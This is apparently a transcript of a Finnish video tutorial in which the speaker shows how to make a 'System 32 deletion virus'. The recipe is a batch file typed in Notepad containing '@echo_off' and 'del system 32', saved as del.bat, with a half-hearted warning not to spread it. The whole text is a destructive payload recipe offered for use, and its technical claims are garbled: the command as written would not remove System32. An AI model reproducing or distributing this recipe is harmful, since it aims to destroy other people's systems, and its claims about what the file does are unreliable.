Moi, tässä on Computer. Tänään mä näytän, miten tehdään System 32 poistovirus. Jotkut sanoo sitä trojalaiseksi, mutta se ei kyllä oikeastaan ole trojalainen. No niin, aloitetaan. Ekaksi avaan Notepadin. Sitten kirjoita siihen @echo_off. No oikeastaan @echo_off ei tarvii. Mut mä vaan tykkään pistää sitä joka paikkaan. Sitten kirjoita del system 32. Del system 32. Toi. Ja sitten tallenna se. Ihan mikä tahansa, vaikka del.bat eli bat. Sitten etitään se tuolla. Tossa. Mä en nyt avaa sitä, koska jos mä avaisin sen, niin se poistaisi mun System 32, joka on yksi tietokoneen tai no se varmaan on kyllä ihan tärkein tietokoneen ohjelma. Et jos sen poistaa, niin koneetta ei voi tavallaan avata tai mitä. Et mä poistan sen nytten. Mut sit mä en siis mitään, jos ei kannata lähettää nettiin. Eikä mä ota mitään, mistään. Jos joku teistä avaa sen, niin mä en siis. Älkää valittako mulle. Moikka.